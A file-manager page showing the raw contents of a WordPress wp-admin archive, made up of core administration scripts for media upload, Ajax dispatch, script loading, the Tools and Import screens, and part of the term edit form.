File manager - Edit - /home/blanktec/reputeus/public_html/wp-admin.tar
Back
async-upload.php 0000644 00000012744 15226322564 0007673 0 ustar 00 <?php /** * Server-side file upload handler from wp-plupload or other asynchronous upload methods. * * @package WordPress * @subpackage Administration */ if ( isset( $_REQUEST['action'] ) && 'upload-attachment' === $_REQUEST['action'] ) { define( 'DOING_AJAX', true ); } if ( ! defined( 'WP_ADMIN' ) ) { define( 'WP_ADMIN', true ); } /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; require_once ABSPATH . 'wp-admin/admin.php'; header( 'Content-Type: text/plain; charset=' . get_option( 'blog_charset' ) ); if ( isset( $_REQUEST['action'] ) && 'upload-attachment' === $_REQUEST['action'] ) { require ABSPATH . 'wp-admin/includes/ajax-actions.php'; send_nosniff_header(); nocache_headers(); wp_ajax_upload_attachment(); die( '0' ); } if ( ! current_user_can( 'upload_files' ) ) { wp_die( __( 'Sorry, you are not allowed to upload files.' ) ); } // Just fetch the detail form for that attachment. if ( isset( $_REQUEST['attachment_id'] ) && (int) $_REQUEST['attachment_id'] && $_REQUEST['fetch'] ) { $id = (int) $_REQUEST['attachment_id']; $post = get_post( $id ); if ( 'attachment' !== $post->post_type ) { wp_die( __( 'Invalid post type.' ) ); } switch ( $_REQUEST['fetch'] ) { case 3: ?> <div class="media-item-wrapper"> <div class="attachment-details"> <?php $thumb_url = wp_get_attachment_image_src( $id, 'thumbnail', true ); if ( $thumb_url ) { echo '<img class="pinkynail" src="' . esc_url( $thumb_url[0] ) . '" alt="" />'; } // Title shouldn't ever be empty, but use filename just in case. $file = get_attached_file( $post->ID ); $file_url = wp_get_attachment_url( $post->ID ); $title = $post->post_title ? $post->post_title : wp_basename( $file ); ?> <div class="filename new"> <span class="media-list-title word-wrap-break-word"><strong><?php echo esc_html( wp_html_excerpt( $title, 60, '…' ) ); ?></strong></span> <span class="media-list-subtitle word-wrap-break-word"><?php echo esc_html( wp_basename( $file ) ); ?></span> <div class="attachment-tools"> <?php if ( current_user_can( 'edit_post', $id ) ) { echo '<a class="edit-attachment" href="' . esc_url( get_edit_post_link( $id ) ) . '">' . _x( 'Edit', 'media item' ) . '</a>'; } else { echo '<span class="edit-attachment">' . _x( 'Success', 'media item' ) . '</span>'; } ?> <span class="media-item-copy-container copy-to-clipboard-container edit-attachment"> <button type="button" class="button button-small copy-attachment-url" data-clipboard-text="<?php echo esc_url( $file_url ); ?>" ><?php _e( 'Copy URL to clipboard' ); ?></button> <span class="success hidden" aria-hidden="true"><?php _e( 'Copied!' ); ?></span> </span> </div> </div> </div> </div> <?php break; case 2: add_filter( 'attachment_fields_to_edit', 'media_single_attachment_fields_to_edit', 10, 2 ); echo get_media_item( $id, array( 'send' => false, 'delete' => true, ) ); break; default: add_filter( 'attachment_fields_to_edit', 'media_post_single_attachment_fields_to_edit', 10, 2 ); echo get_media_item( $id ); break; } exit; } check_admin_referer( 'media-form' ); $post_id = 0; if ( isset( $_REQUEST['post_id'] ) ) { $post_id = absint( $_REQUEST['post_id'] ); if ( ! get_post( $post_id ) || ! current_user_can( 'edit_post', $post_id ) ) { $post_id = 0; } } $id = media_handle_upload( 'async-upload', $post_id ); if ( is_wp_error( $id ) ) { $button_unique_id = uniqid( 'dismiss-' ); $error_description_id = uniqid( 'error-description-' ); $message = sprintf( '%s <strong>%s</strong><br />%s', sprintf( '<button type="button" id="%1$s" class="dismiss button-link" aria-describedby="%2$s">%3$s</button>', esc_attr( $button_unique_id ), esc_attr( $error_description_id ), __( 'Dismiss' ) ), sprintf( /* translators: %s: Name of the file that failed to upload. */ __( '“%s” has failed to upload.' ), esc_html( $_FILES['async-upload']['name'] ) ), esc_html( $id->get_error_message() ) ); wp_admin_notice( $message, array( 'id' => $error_description_id, 'additional_classes' => array( 'error-div', 'error' ), 'paragraph_wrap' => false, ) ); $speak_message = sprintf( /* translators: %s: Name of the file that failed to upload. */ __( '%s has failed to upload.' ), $_FILES['async-upload']['name'] ); echo '<script>_.delay(function() {wp.a11y.speak(' . wp_json_encode( $speak_message, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) . ");}, 1500);jQuery( 'button#{$button_unique_id}' ).on( 'click', function() {jQuery(this).parents('div.media-item').slideUp(200, function(){jQuery(this).remove();wp.a11y.speak( wp.i18n.__( 'Error dismissed.' ) );jQuery( '#plupload-browse-button' ).trigger( 'focus' );})});</script>\n"; exit; } if ( $_REQUEST['short'] ) { // Short form response - attachment ID only. echo $id; } else { // Long form response - big chunk of HTML. $type = $_REQUEST['type']; /** * Filters the returned ID of an uploaded attachment. * * The dynamic portion of the hook name, `$type`, refers to the attachment type. * * Possible hook names include: * * - `async_upload_audio` * - `async_upload_file` * - `async_upload_image` * - `async_upload_video` * * @since 2.5.0 * * @param int $id Uploaded attachment ID. */ echo apply_filters( "async_upload_{$type}", $id ); } admin-ajax.php 0000644 00000012032 15226322564 0007273 0 ustar 00 <?php /** * WordPress Ajax Process Execution * * @package WordPress * @subpackage Administration * * @link https://developer.wordpress.org/plugins/javascript/ajax */ /** * Executing Ajax process. * * @since 2.1.0 */ define( 'DOING_AJAX', true ); if ( ! defined( 'WP_ADMIN' ) ) { define( 'WP_ADMIN', true ); } /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; /** Allow for cross-domain requests (from the front end). */ send_origin_headers(); header( 'Content-Type: text/html; charset=' . get_option( 'blog_charset' ) ); header( 'X-Robots-Tag: noindex' ); // Require a valid action parameter. if ( empty( $_REQUEST['action'] ) || ! is_scalar( $_REQUEST['action'] ) ) { wp_die( '0', 400 ); } /** Load WordPress Administration APIs */ require_once ABSPATH . 'wp-admin/includes/admin.php'; /** Load Ajax Handlers for WordPress Core */ require_once ABSPATH . 'wp-admin/includes/ajax-actions.php'; send_nosniff_header(); nocache_headers(); /** This action is documented in wp-admin/admin.php */ do_action( 'admin_init' ); $core_actions_get = array( 'fetch-list', 'ajax-tag-search', 'wp-compression-test', 'imgedit-preview', 'oembed-cache', 'autocomplete-user', 'dashboard-widgets', 'logged-in', 'rest-nonce', ); $core_actions_post = array( 'oembed-cache', 'image-editor', 'delete-comment', 'delete-tag', 'delete-link', 'delete-meta', 'delete-post', 'trash-post', 'untrash-post', 'delete-page', 'dim-comment', 'add-link-category', 'add-tag', 'get-tagcloud', 'get-comments', 'replyto-comment', 'edit-comment', 'add-menu-item', 'add-meta', 'add-user', 'closed-postboxes', 'hidden-columns', 'update-welcome-panel', 'menu-get-metabox', 'wp-link-ajax', 'menu-locations-save', 'menu-quick-search', 'meta-box-order', 'get-permalink', 'sample-permalink', 'inline-save', 'inline-save-tax', 'find_posts', 'widgets-order', 'save-widget', 'delete-inactive-widgets', 'set-post-thumbnail', 'date_format', 'time_format', 'wp-remove-post-lock', 'dismiss-wp-pointer', 'upload-attachment', 'get-attachment', 'query-attachments', 'save-attachment', 'save-attachment-compat', 'send-link-to-editor', 'send-attachment-to-editor', 'save-attachment-order', 'media-create-image-subsizes', 'heartbeat', 'get-revision-diffs', 'save-user-color-scheme', 'update-widget', 'query-themes', 'parse-embed', 'set-attachment-thumbnail', 'parse-media-shortcode', 'destroy-sessions', 'install-plugin', 'activate-plugin', 'update-plugin', 'crop-image', 'generate-password', 'save-wporg-username', 'delete-plugin', 'search-plugins', 'search-install-plugins', 'activate-plugin', 'update-theme', 'delete-theme', 'install-theme', 'get-post-thumbnail-html', 'get-community-events', 'edit-theme-plugin-file', 'wp-privacy-export-personal-data', 'wp-privacy-erase-personal-data', 'health-check-site-status-result', 'health-check-dotorg-communication', 'health-check-is-in-debug-mode', 'health-check-background-updates', 'health-check-loopback-requests', 'health-check-get-sizes', 'toggle-auto-updates', 'send-password-reset', ); // Deprecated. $core_actions_post_deprecated = array( 'wp-fullscreen-save-post', 'press-this-save-post', 'press-this-add-category', 'health-check-dotorg-communication', 'health-check-is-in-debug-mode', 'health-check-background-updates', 'health-check-loopback-requests', ); $core_actions_post = array_merge( $core_actions_post, $core_actions_post_deprecated ); // Register core Ajax calls. if ( ! empty( $_GET['action'] ) && in_array( $_GET['action'], $core_actions_get, true ) ) { add_action( 'wp_ajax_' . $_GET['action'], 'wp_ajax_' . str_replace( '-', '_', $_GET['action'] ), 1 ); } if ( ! empty( $_POST['action'] ) && in_array( $_POST['action'], $core_actions_post, true ) ) { add_action( 'wp_ajax_' . $_POST['action'], 'wp_ajax_' . str_replace( '-', '_', $_POST['action'] ), 1 ); } add_action( 'wp_ajax_nopriv_generate-password', 'wp_ajax_nopriv_generate_password' ); add_action( 'wp_ajax_nopriv_heartbeat', 'wp_ajax_nopriv_heartbeat', 1 ); // Register Plugin Dependencies Ajax calls. add_action( 'wp_ajax_check_plugin_dependencies', array( 'WP_Plugin_Dependencies', 'check_plugin_dependencies_during_ajax' ) ); $action = $_REQUEST['action']; if ( is_user_logged_in() ) { // If no action is registered, return a Bad Request response. if ( ! has_action( "wp_ajax_{$action}" ) ) { wp_die( '0', 400 ); } /** * Fires authenticated Ajax actions for logged-in users. * * The dynamic portion of the hook name, `$action`, refers * to the name of the Ajax action callback being fired. * * @since 2.1.0 */ do_action( "wp_ajax_{$action}" ); } else { // If no action is registered, return a Bad Request response. if ( ! has_action( "wp_ajax_nopriv_{$action}" ) ) { wp_die( '0', 400 ); } /** * Fires non-authenticated Ajax actions for logged-out users. * * The dynamic portion of the hook name, `$action`, refers * to the name of the Ajax action callback being fired. * * @since 2.8.0 */ do_action( "wp_ajax_nopriv_{$action}" ); } // Default status. wp_die( '0' ); media-new.php 0000644 00000006261 15226322564 0007137 0 ustar 00 <?php /** * Manage media uploaded file. * * There are many filters in here for media. Plugins can extend functionality * by hooking into the filters. * * @package WordPress * @subpackage Administration */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'upload_files' ) ) { wp_die( __( 'Sorry, you are not allowed to upload files.' ) ); } wp_enqueue_script( 'plupload-handlers' ); $post_id = 0; if ( isset( $_REQUEST['post_id'] ) ) { $post_id = absint( $_REQUEST['post_id'] ); if ( ! get_post( $post_id ) || ! current_user_can( 'edit_post', $post_id ) ) { $post_id = 0; } } if ( $_POST ) { if ( isset( $_POST['html-upload'] ) && ! empty( $_FILES ) ) { check_admin_referer( 'media-form' ); // Upload File button was clicked. $upload_id = media_handle_upload( 'async-upload', $post_id ); if ( is_wp_error( $upload_id ) ) { wp_die( $upload_id ); } } wp_redirect( admin_url( 'upload.php' ) ); exit; } // Used in the HTML title tag. $title = __( 'Upload Media' ); $parent_file = 'upload.php'; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'You can upload media files here without creating a post first. This allows you to upload files to use with posts and pages later and/or to get a web link for a particular file that you can share. There are three options for uploading files:' ) . '</p>' . '<ul>' . '<li>' . __( '<strong>Drag and drop</strong> your files into the area below. Multiple files are allowed.' ) . '</li>' . '<li>' . __( 'Clicking <strong>Select Files</strong> opens a navigation window showing you files in your operating system. Selecting <strong>Open</strong> after clicking on the file you want activates a progress bar on the uploader screen.' ) . '</li>' . '<li>' . __( 'Revert to the <strong>Browser Uploader</strong> by clicking the link below the drag and drop box.' ) . '</li>' . '</ul>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/media-add-new-screen/">Documentation on Uploading Media Files</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); require_once ABSPATH . 'wp-admin/admin-header.php'; $form_class = 'wp-upload-form media-upload-form type-form validate'; if ( get_user_setting( 'uploader' ) || isset( $_GET['browser-uploader'] ) ) { $form_class .= ' html-uploader'; } ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <form enctype="multipart/form-data" method="post" action="<?php echo esc_url( admin_url( 'media-new.php' ) ); ?>" class="<?php echo esc_attr( $form_class ); ?>" id="file-form"> <?php media_upload_form(); ?> <script> var post_id = <?php echo absint( $post_id ); ?>, shortform = 3; </script> <input type="hidden" name="post_id" id="post_id" value="<?php echo absint( $post_id ); ?>" /> <?php wp_nonce_field( 'media-form' ); ?> <div id="media-items" class="hide-if-no-js"></div> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; load-scripts.php 0000644 00000004026 15226322564 0007672 0 ustar 00 <?php /* * The error_reporting() function can be disabled in php.ini. On systems where that is the case, * it's best to add a dummy function to the wp-config.php file, but as this call to the function * is run prior to wp-config.php loading, it is wrapped in a function_exists() check. */ if ( function_exists( 'error_reporting' ) ) { /* * Disable error reporting. * * Set this to error_reporting( -1 ) for debugging. */ error_reporting( 0 ); } // Set ABSPATH for execution. if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( __DIR__ ) . '/' ); } define( 'WPINC', 'wp-includes' ); $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) { $protocol = 'HTTP/1.0'; } $load = $_GET['load']; if ( is_array( $load ) ) { ksort( $load ); $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); if ( empty( $load ) ) { header( "$protocol 400 Bad Request" ); exit; } require ABSPATH . 'wp-admin/includes/noop.php'; require ABSPATH . WPINC . '/script-loader.php'; require ABSPATH . WPINC . '/version.php'; $expires_offset = 31536000; // 1 year. $out = ''; $wp_scripts = new WP_Scripts(); wp_default_scripts( $wp_scripts ); wp_default_packages_vendor( $wp_scripts ); wp_default_packages_scripts( $wp_scripts ); $etag = $wp_scripts->get_etag( $load ); if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) && stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ) === $etag ) { header( "$protocol 304 Not Modified" ); exit; } foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) { continue; } $path = ABSPATH . $wp_scripts->registered[ $handle ]->src; $out .= get_file( $path ) . "\n"; } header( "Etag: $etag" ); header( 'Content-Type: application/javascript; charset=UTF-8' ); header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + $expires_offset ) . ' GMT' ); header( "Cache-Control: public, max-age=$expires_offset" ); echo $out; exit; tools.php 0000644 00000006672 15226322564 0006437 0 ustar 00 <?php /** * Tools Administration Screen. * * @package WordPress * @subpackage Administration */ if ( isset( $_GET['page'] ) && ! empty( $_POST ) ) { // Ensure POST-ing to `tools.php?page=export_personal_data` and `tools.php?page=remove_personal_data` // continues to work after creating the new files for exporting and erasing of personal data. if ( 'export_personal_data' === $_GET['page'] ) { require_once ABSPATH . 'wp-admin/export-personal-data.php'; return; } elseif ( 'remove_personal_data' === $_GET['page'] ) { require_once ABSPATH . 'wp-admin/erase-personal-data.php'; return; } } // The privacy policy guide used to be outputted from here. Since WP 5.3 it is in wp-admin/privacy-policy-guide.php. if ( isset( $_GET['wp-privacy-policy-guide'] ) ) { require_once dirname( __DIR__ ) . '/wp-load.php'; wp_redirect( admin_url( 'options-privacy.php?tab=policyguide' ), 301 ); exit; } elseif ( isset( $_GET['page'] ) ) { // These were also moved to files in WP 5.3. if ( 'export_personal_data' === $_GET['page'] ) { require_once dirname( __DIR__ ) . '/wp-load.php'; wp_redirect( admin_url( 'export-personal-data.php' ), 301 ); exit; } elseif ( 'remove_personal_data' === $_GET['page'] ) { require_once dirname( __DIR__ ) . '/wp-load.php'; wp_redirect( admin_url( 'erase-personal-data.php' ), 301 ); exit; } } /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; // Used in the HTML title tag. $title = __( 'Tools' ); get_current_screen()->add_help_tab( array( 'id' => 'converter', 'title' => __( 'Categories and Tags Converter' ), 'content' => '<p>' . __( 'Categories have hierarchy, meaning that you can nest sub-categories. Tags do not have hierarchy and cannot be nested. Sometimes people start out using one on their posts, then later realize that the other would work better for their content.' ) . '</p>' . '<p>' . __( 'The Categories and Tags Converter link on this screen will take you to the Import screen, where that Converter is one of the plugins you can install. Once that plugin is installed, the Activate Plugin & Run Importer link will take you to a screen where you can choose to convert tags into categories or vice versa.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/tools-screen/">Documentation on Tools</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <?php if ( current_user_can( 'import' ) ) : $cats = get_taxonomy( 'category' ); $tags = get_taxonomy( 'post_tag' ); if ( current_user_can( $cats->cap->manage_terms ) || current_user_can( $tags->cap->manage_terms ) ) : ?> <div class="card"> <h2 class="title"><?php _e( 'Categories and Tags Converter' ); ?></h2> <p> <?php printf( /* translators: %s: URL to Import screen. */ __( 'If you want to convert your categories to tags (or vice versa), use the <a href="%s">Categories and Tags Converter</a> available from the Import screen.' ), 'import.php' ); ?> </p> </div> <?php endif; endif; /** * Fires at the end of the Tools Administration screen. * * @since 2.8.0 */ do_action( 'tool_box' ); ?> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; import.php 0000644 00000017126 15226322564 0006605 0 ustar 00 <?php /** * Import WordPress Administration Screen * * @package WordPress * @subpackage Administration */ define( 'WP_LOAD_IMPORTERS', true ); /** Load WordPress Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'import' ) ) { wp_die( __( 'Sorry, you are not allowed to import content into this site.' ) ); } // Used in the HTML title tag. $title = __( 'Import' ); get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'This screen lists links to plugins to import data from blogging/content management platforms. Choose the platform you want to import from, and click Install Now when you are prompted in the popup window. If your platform is not listed, click the link to search the plugin directory for other importer plugins to see if there is one for your platform.' ) . '</p>' . '<p>' . __( 'In previous versions of WordPress, all importers were built-in. They have been turned into plugins since most people only use them once or infrequently.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/tools-import-screen/">Documentation on Import</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); if ( current_user_can( 'install_plugins' ) ) { // List of popular importer plugins from the WordPress.org API. $popular_importers = wp_get_popular_importers(); } else { $popular_importers = array(); } // Detect and redirect invalid importers like 'movabletype', which is registered as 'mt'. if ( ! empty( $_GET['invalid'] ) && isset( $popular_importers[ $_GET['invalid'] ] ) ) { $importer_id = $popular_importers[ $_GET['invalid'] ]['importer-id']; if ( $importer_id !== $_GET['invalid'] ) { // Prevent redirect loops. wp_redirect( admin_url( 'admin.php?import=' . $importer_id ) ); exit; } unset( $importer_id ); } add_thickbox(); wp_enqueue_script( 'plugin-install' ); wp_enqueue_script( 'updates' ); require_once ABSPATH . 'wp-admin/admin-header.php'; $parent_file = 'tools.php'; ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <?php if ( ! empty( $_GET['invalid'] ) ) : $importer_not_installed = '<strong>' . __( 'Error:' ) . '</strong> ' . sprintf( /* translators: %s: Importer slug. */ __( 'The %s importer is invalid or is not installed.' ), '<strong>' . esc_html( $_GET['invalid'] ) . '</strong>' ); wp_admin_notice( $importer_not_installed, array( 'additional_classes' => array( 'error' ), ) ); endif; ?> <p><?php _e( 'If you have posts or comments in another system, WordPress can import those into this site. To get started, choose a system to import from below:' ); ?></p> <?php // Registered (already installed) importers. They're stored in the global $wp_importers. $importers = get_importers(); // If a popular importer is not registered, create a dummy registration that links to the plugin installer. foreach ( $popular_importers as $pop_importer => $pop_data ) { if ( isset( $importers[ $pop_importer ] ) ) { continue; } if ( isset( $importers[ $pop_data['importer-id'] ] ) ) { continue; } // Fill the array of registered (already installed) importers with data of the popular importers from the WordPress.org API. $importers[ $pop_data['importer-id'] ] = array( $pop_data['name'], $pop_data['description'], 'install' => $pop_data['plugin-slug'], ); } if ( empty( $importers ) ) { echo '<p>' . __( 'No importers are available.' ) . '</p>'; // TODO: Make more helpful. } else { uasort( $importers, '_usort_by_first_member' ); ?> <table class="widefat importers striped"> <?php foreach ( $importers as $importer_id => $data ) { $plugin_slug = ''; $action = ''; $is_plugin_installed = false; if ( isset( $data['install'] ) ) { $plugin_slug = $data['install']; if ( file_exists( WP_PLUGIN_DIR . '/' . $plugin_slug ) ) { // Looks like an importer is installed, but not active. $plugins = get_plugins( '/' . $plugin_slug ); if ( ! empty( $plugins ) ) { $keys = array_keys( $plugins ); $plugin_file = $plugin_slug . '/' . $keys[0]; $url = wp_nonce_url( add_query_arg( array( 'action' => 'activate', 'plugin' => $plugin_file, 'from' => 'import', ), admin_url( 'plugins.php' ) ), 'activate-plugin_' . $plugin_file ); $action = sprintf( '<a href="%s" aria-label="%s">%s</a>', esc_url( $url ), /* translators: %s: Importer name. */ esc_attr( sprintf( __( 'Run %s' ), $data[0] ) ), __( 'Run Importer' ) ); $is_plugin_installed = true; } } if ( empty( $action ) ) { if ( is_main_site() ) { $url = wp_nonce_url( add_query_arg( array( 'action' => 'install-plugin', 'plugin' => $plugin_slug, 'from' => 'import', ), self_admin_url( 'update.php' ) ), 'install-plugin_' . $plugin_slug ); $action = sprintf( '<a href="%1$s" class="install-now" data-slug="%2$s" data-name="%3$s" aria-label="%4$s">%5$s</a>', esc_url( $url ), esc_attr( $plugin_slug ), esc_attr( $data[0] ), /* translators: %s: Importer name. */ esc_attr( sprintf( _x( 'Install %s now', 'plugin' ), $data[0] ) ), _x( 'Install Now', 'plugin' ) ); } else { $action = sprintf( /* translators: %s: URL to Import screen on the main site. */ __( 'This importer is not installed. Please install importers from <a href="%s">the main site</a>.' ), get_admin_url( get_current_network_id(), 'import.php' ) ); } } } else { $url = add_query_arg( array( 'import' => $importer_id, ), self_admin_url( 'admin.php' ) ); $action = sprintf( '<a href="%1$s" aria-label="%2$s">%3$s</a>', esc_url( $url ), /* translators: %s: Importer name. */ esc_attr( sprintf( __( 'Run %s' ), $data[0] ) ), __( 'Run Importer' ) ); $is_plugin_installed = true; } if ( ! $is_plugin_installed && is_main_site() ) { $url = add_query_arg( array( 'tab' => 'plugin-information', 'plugin' => $plugin_slug, 'from' => 'import', 'TB_iframe' => 'true', 'width' => 600, 'height' => 550, ), network_admin_url( 'plugin-install.php' ) ); $action .= sprintf( ' | <a href="%1$s" class="thickbox open-plugin-details-modal" aria-label="%2$s">%3$s</a>', esc_url( $url ), /* translators: %s: Importer name. */ esc_attr( sprintf( __( 'More information about %s' ), $data[0] ) ), __( 'Details' ) ); } echo " <tr class='importer-item'> <td class='import-system'> <span class='importer-title'>{$data[0]}</span> <span class='importer-action'>{$action}</span> </td> <td class='desc'> <span class='importer-desc'>{$data[1]}</span> </td> </tr>"; } ?> </table> <?php } if ( current_user_can( 'install_plugins' ) ) { echo '<p>' . sprintf( /* translators: %s: URL to Add Plugins screen. */ __( 'If the importer you need is not listed, <a href="%s">search the plugin directory</a> to see if an importer is available.' ), esc_url( network_admin_url( 'plugin-install.php?tab=search&type=tag&s=importer' ) ) ) . '</p>'; } /** * Fires at the end of the Import screen. * * @since 6.8.0 */ do_action( 'import_filters' ); ?> </div> <?php wp_print_request_filesystem_credentials_modal(); wp_print_admin_notice_templates(); require_once ABSPATH . 'wp-admin/admin-footer.php'; edit-tag-form.php 0000644 00000024651 15226322564 0007733 0 ustar 00 <?php /** * Edit tag form for inclusion in administration panels. * * @package WordPress * @subpackage Administration */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } // Back compat hooks. if ( 'category' === $taxonomy ) { /** * Fires before the Edit Category form. * * @since 2.1.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_pre_edit_form'} instead. * * @param WP_Term $tag Current category term object. */ do_action_deprecated( 'edit_category_form_pre', array( $tag ), '3.0.0', '{$taxonomy}_pre_edit_form' ); } elseif ( 'link_category' === $taxonomy ) { /** * Fires before the Edit Link Category form. * * @since 2.3.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_pre_edit_form'} instead. * * @param WP_Term $tag Current link category term object. */ do_action_deprecated( 'edit_link_category_form_pre', array( $tag ), '3.0.0', '{$taxonomy}_pre_edit_form' ); } else { /** * Fires before the Edit Tag form. * * @since 2.5.0 * @deprecated 3.0.0 Use {@see '{$taxonomy}_pre_edit_form'} instead. * * @param WP_Term $tag Current tag term object. */ do_action_deprecated( 'edit_tag_form_pre', array( $tag ), '3.0.0', '{$taxonomy}_pre_edit_form' ); } $wp_http_referer = ! empty( $_REQUEST['wp_http_referer'] ) ? sanitize_url( $_REQUEST['wp_http_referer'] ) : ''; $wp_http_referer = remove_query_arg( array( 'action', 'message', 'tag_ID' ), $wp_http_referer ); // Also used by Edit Tags. require_once ABSPATH . 'wp-admin/includes/edit-tag-messages.php'; /** * Fires before the Edit Term form for all taxonomies. * * The dynamic portion of the hook name, `$taxonomy`, refers to * the taxonomy slug. * * Possible hook names include: * * - `category_pre_edit_form` * - `post_tag_pre_edit_form` * * @since 3.0.0 * * @param WP_Term $tag Current taxonomy term object. * @param string $taxonomy Current $taxonomy slug. */ do_action( "{$taxonomy}_pre_edit_form", $tag, $taxonomy ); ?> <div class="wrap"> <h1><?php echo $tax->labels->edit_item; ?></h1> <?php $class = ( isset( $_REQUEST['error'] ) ) ? 'error' : 'success'; if ( $message ) { $message = '<p><strong>' . $message . '</strong></p>'; if ( $wp_http_referer ) { $message .= sprintf( '<p><a href="%1$s">%2$s</a></p>', esc_url( wp_validate_redirect( sanitize_url( $wp_http_referer ), admin_url( 'term.php?taxonomy=' . $taxonomy ) ) ), esc_html( $tax->labels->back_to_items ) ); } wp_admin_notice( $message, array( 'type' => $class, 'id' => 'message', 'paragraph_wrap' => false, ) ); } ?> <div id="ajax-response"></div> <form name="edittag" id="edittag" method="post" action="edit-tags.php" class="validate" <?php /** * Fires inside the Edit Term form tag. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_term_edit_form_tag` * - `post_tag_term_edit_form_tag` * * @since 3.7.0 */ do_action( "{$taxonomy}_term_edit_form_tag" ); ?> > <input type="hidden" name="action" value="editedtag" /> <input type="hidden" name="tag_ID" value="<?php echo esc_attr( $tag_ID ); ?>" /> <input type="hidden" name="taxonomy" value="<?php echo esc_attr( $taxonomy ); ?>" /> <?php wp_original_referer_field( true, 'previous' ); wp_nonce_field( 'update-tag_' . $tag_ID ); /** * Fires at the beginning of the Edit Term form. * * At this point, the required hidden fields and nonces have already been output. * * The dynamic portion of the hook name, `$taxonomy`, refers to the taxonomy slug. * * Possible hook names include: * * - `category_term_edit_form_top` * - `post_tag_term_edit_form_top` * * @since 4.5.0 * * @param WP_Term $tag Current taxonomy term object. * @param string $taxonomy Current $taxonomy slug. */ do_action( "{$taxonomy}_term_edit_form_top", $tag, $taxonomy ); $tag_name_value = ''; if ( isset( $tag->name ) ) { $tag_name_value = esc_attr( $tag->name ); } ?> <table class="form-table" role="presentation"> <tr class="form-field form-required term-name-wrap"> <th scope="row"><label for="name"><?php _ex( 'Name', 'term name' ); ?></label></th> <td><input name="name" id="name" type="text" value="<?php echo $tag_name_value; ?>" size="40" aria-required="true" aria-describedby="name-description" /> <p class="description" id="name-description"><?php echo $tax->labels->name_field_description; ?></p></td> </tr> <tr class="form-field term-slug-wrap"> <th scope="row"><label for="slug"><?php _e( 'Slug' ); ?></label></th> <?php /** * Filters the editable slug for a post or term. * * Note: This is a multi-use hook in that it is leveraged both for editable * post URIs and term slugs. * * @since 2.6.0 * @since 4.4.0 The `$tag` parameter was added. * * @param string $slug The editable slug. Will be either a term slug or post URI depending * upon the context in which it is evaluated. * @param WP_Term|WP_Post $tag Term or post object. */ $slug = isset( $tag->slug ) ? apply_filters( 'editable_slug', $tag->slug, $tag ) : ''; ?> <td><input name="slug" id="slug" type="text" value="<?php echo esc_attr( $slug ); ?>" size="40" aria-describedby="slug-description" /> <p class="description" id="slug-description"><?php echo $tax->labels->slug_field_description; ?></p></td> </tr> <?php if ( is_taxonomy_hierarchical( $taxonomy ) ) : ?> <tr class="form-field term-parent-wrap"> <th scope="row"><label for="parent"><?php echo esc_html( $tax->labels->parent_item ); ?></label></th> <td> <?php $dropdown_args = array( 'hide_empty' => 0, 'hide_if_empty' => false, 'taxonomy' => $taxonomy, 'name' => 'parent', 'orderby' => 'name', 'selected' => $tag->parent, 'exclude_tree' => $tag->term_id, 'hierarchical' => true, 'show_option_none' => __( 'None' ), 'aria_describedby' => 'parent-description', ); /** This filter is documented in wp-admin/edit-tags.php */ $dropdown_args = apply_filters( 'taxonomy_parent_dropdown_args', $dropdown_args, $taxonomy, 'edit' ); wp_dropdown_categories( $dropdown_args ); ?> <?php if ( 'category' === $taxonomy ) : ?> <p class="description" id="parent-description"><?php _e( 'Categories, unlike tags, can have a hierarchy. You might have a Jazz category, and under that have children categories for Bebop and Big Band. Totally optional.' ); ?></p> <?php else : ?> <p class="description" id="parent-description"><?php echo $tax->labels->parent_field_description; ?></p> <?php endif; ?> </td> </tr> <?php endif; // is_taxonomy_hierarchical() ?> <tr class="form-field term-description-wrap"> <th scope="row"><label for="description"><?php _e( 'Description' ); ?></label></th> <td><textarea name="description" id="description" rows="5" cols="50" class="large-text" aria-describedby="description-description"><?php echo $tag->description; // textarea_escaped ?></textarea> <p class="description" id="description-description"><?php echo $tax->labels->desc_field_description; ?></p></td> </tr> 